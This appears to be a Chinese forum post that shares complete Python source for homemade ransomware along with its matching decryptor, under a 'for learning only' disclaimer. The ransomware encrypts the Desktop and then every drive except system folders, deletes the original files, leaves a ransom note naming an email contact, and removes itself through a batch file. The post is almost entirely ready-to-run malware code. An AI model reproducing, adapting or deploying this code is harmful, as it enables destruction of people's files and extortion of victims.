物理 自研勒索病毒,py源码!
⚠禁止用于非法用途,本贴仅供学习技术⚠
病毒源码👇
import os
import sys
import base64
from datetime import datetime
from cryptography.fernet import Fernet
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.backends import default_backend
import threading
def generate_key_from_date(date_str):
kdf = PBKDF2HMAC(
algorithm=hashes.SHA256(),
length=32,
salt=b'salt_',
iterations=100000,
backend=default_backend()
)
return base64.urlsafe_b64encode(kdf.derive(date_str.encode()))
def encrypt_file(filepath, cipher):
try:
if any(filepath.lower().endswith(ext) for ext in ['.locked', '.dll']):
return
# 跳过当前程序自身
current_exe = os.path.abspath(sys.argv[0])
if os.path.abspath(filepath) == current_exe:
return
print(f"正在加密: {filepath}")
with open(filepath, 'rb') as f:
data = f.read()
encrypted = cipher.encrypt(data)
with open(filepath + '._locked_', 'wb') as f:
f.write(encrypted)
os.remove(filepath)
except Exception as e:
print(f"跳过文件(加密失败): {filepath} | 错误: {str(e)}")
def encrypt_folder(folder, cipher):
for root, _, files in os.walk(folder):
for file in files:
encrypt_file(os.path.join(root, file), cipher)
def encrypt_desktop_first(cipher):
desktop = os.path.join(os.path.expanduser('~'), 'Desktop')
if os.path.exists(desktop):
print("\n=== 优先加密桌面文件 ===")
encrypt_folder(desktop, cipher)
def encrypt_other_drives(cipher):
skip_dirs = {'Windows', 'Program Files', 'System Volume Information'}
drives = [f"{d}:\\" for d in 'CDEFGHIJKLMNOPQRSTUVWXYZ' if os.path.exists(f"{d}:\\")]
for drive in drives:
print(f"\n=== 开始加密盘符: {drive} ===")
for root, dirs, files in os.walk(drive):
if any(skip_dir in root for skip_dir in skip_dirs):
continue
for file in files:
encrypt_file(os.path.join(root, file), cipher)
def self_delete():
exe_path = os.path.abspath(sys.argv[0])
try:
bat_path = exe_path + ".bat"
with open(bat_path, 'w') as f:
f.write(f"""@echo off
ping 127.0.0.1 -n 3 >nul
del "{exe_path}"
del "%~f0"
""")
os.startfile(bat_path)
except Exception as e:
print(f"[!] 自删除失败: {e}")
def encrypt_system():
encryption_date = datetime.now().strftime("%Y%m%d")
key = generate_key_from_date(encryption_date)
cipher = Fernet(key)
print(f"=== 开始加密系统(密钥日期: {encryption_date})===")
encrypt_desktop_first(cipher)
thread = threading.Thread(target=encrypt_other_drives, args=(cipher,))
thread.start()
thread.join()
ransom_note = os.path.join(os.path.expanduser('~'), 'Desktop', '!!!看我看我!!!.txt')
with open(ransom_note, 'w') as f:
f.write(
f"你的文件已被加密!\n"
f"加密日期:{encryption_date}\n"
f"想要恢复文件,向 bruce201105@gmail.com 发一封邮件,并附上加密日期,以领取文件解密器!"
)
print("\n=== 加密完成!准备自毁 ===")
self_delete()
if __name__ == "__main__":
encrypt_system()
解密器源码👇
import os
import sys
import base64
from datetime import datetime
from cryptography.fernet import Fernet
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.backends import default_backend
import threading
def generate_key_from_date(date_str):
kdf = PBKDF2HMAC(
algorithm=hashes.SHA256(),
length=32,
salt=b'salt_',
iterations=100000,
backend=default_backend()
)
return base64.urlsafe_b64encode(kdf.derive(date_str.encode()))
def is_valid_date(date_str):
if len(date_str) != 8 or not date_str.isdigit():
return False
try:
datetime.strptime(date_str, "%Y%m%d")
return True
except ValueError:
return False
def decrypt_file(filepath, cipher):
try:
if not filepath.lower().endswith('._locked_'):
return
current_exe = os.path.abspath(sys.argv[0])
if os.path.abspath(filepath) == current_exe:
return
print(f"正在解密: {filepath}")
with open(filepath, 'rb') as f:
data = f.read()
decrypted = cipher.decrypt(data)
original_path = filepath[:-9] # 去掉 ._locked_
with open(original_path, 'wb') as f:
f.write(decrypted)
os.remove(filepath)
print(f"解密成功: {original_path}")
except Exception as e:
print(f"跳过文件(解密失败): {filepath} | 错误: {str(e)}")
def decrypt_folder(folder, cipher):
for root, _, files in os.walk(folder):
for file in files:
decrypt_file(os.path.join(root, file), cipher)
def decrypt_desktop_first(cipher):
desktop = os.path.join(os.path.expanduser('~'), 'Desktop')
if os.path.exists(desktop):
print("\n=== 优先解密桌面文件 ===")
decrypt_folder(desktop, cipher)
def decrypt_other_drives(cipher):
skip_dirs = {'Windows', 'Program Files', 'System Volume Information'}
drives = [f"{d}:\\" for d in 'CDEFGHIJKLMNOPQRSTUVWXYZ' if os.path.exists(f"{d}:\\")]
for drive in drives:
print(f"\n=== 开始解密盘符: {drive} ===")
for root, dirs, files in os.walk(drive):
if any(skip_dir in root for skip_dir in skip_dirs):
continue
for file in files:
decrypt_file(os.path.join(root, file), cipher)
def decrypt_system():
date_str = input("请输入加密时的日期密钥(格式YYYYMMDD): ")
if not is_valid_date(date_str):
print("日期格式错误,应为YYYYMMDD,例如:20230517")
sys.exit(1)
key = generate_key_from_date(date_str)
cipher = Fernet(key)
print(f"=== 开始解密系统(密钥日期: {date_str})===")
decrypt_desktop_first(cipher)
thread = threading.Thread(target=decrypt_other_drives, args=(cipher,))
thread.start()
thread.join() # 等待解密线程完成
print("\n=== 解密完成! ===")
if __name__ == "__main__":
decrypt_system()
共2条回复
时间正序
4条评论
- 1